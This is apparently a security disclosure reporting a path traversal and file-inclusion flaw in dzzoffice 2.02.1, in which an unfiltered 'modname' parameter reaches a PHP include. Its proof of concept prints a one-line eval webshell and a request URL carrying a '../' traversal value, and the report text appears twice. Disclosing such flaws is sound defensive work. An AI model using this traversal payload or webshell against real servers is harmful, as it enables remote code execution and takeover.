...
$identify=$_GET['modname']; // Line 13(Source)
$appConfig=DZZ_ROOT.'./dzz/'.$identify.'/config/config.php'; // Line 15(Tainted)
if($identify && file_exists($appConfig)){
$config=include($appConfig); // Line 17(Sink)
...
Source from $_GET['modname'] without filtering. And then concated into DZZ_ROOT.'./dzz/'.$identify.'/config/config.php' which allows hackers to have some control over the addresses of the included files, as it is necessary to ensure that the file path ends with /config/config. php.
If combined with vulnerabilities in other sites of the server or other unknown vulnerabilities in this CMS, it is likely to cause the effect of RCE.
Poc
We have set up a webshell in the root directory of the disk where the server is located to demonstrate the combined effects that this vulnerability may cause.
Hello,
I would like to report for a Path Traversal vulnerability in dzzoffice-2.02.1(No permissions required)
In file https://github.com/zyx0814/dzzoffice/blob/master/user/space/about.php
Source from
$_GET['modname']without filtering. And then concated intoDZZ_ROOT.'./dzz/'.$identify.'/config/config.php'which allows hackers to have some control over the addresses of the included files, as it is necessary to ensure that the file path ends with /config/config. php.If combined with vulnerabilities in other sites of the server or other unknown vulnerabilities in this CMS, it is likely to cause the effect of RCE.
Poc
We have set up a webshell in the root directory of the disk where the server is located to demonstrate the combined effects that this vulnerability may cause.
Webshell path: D:\config\config.php, Content:
<?php @eval($_POST['pass']) ?>CMS path: D:\phpstudy_pro\WWW\cms.dzzoffice.com
POST http://cms.dzzoffice.com/user.php?op=about&modname=../../../../Manual verification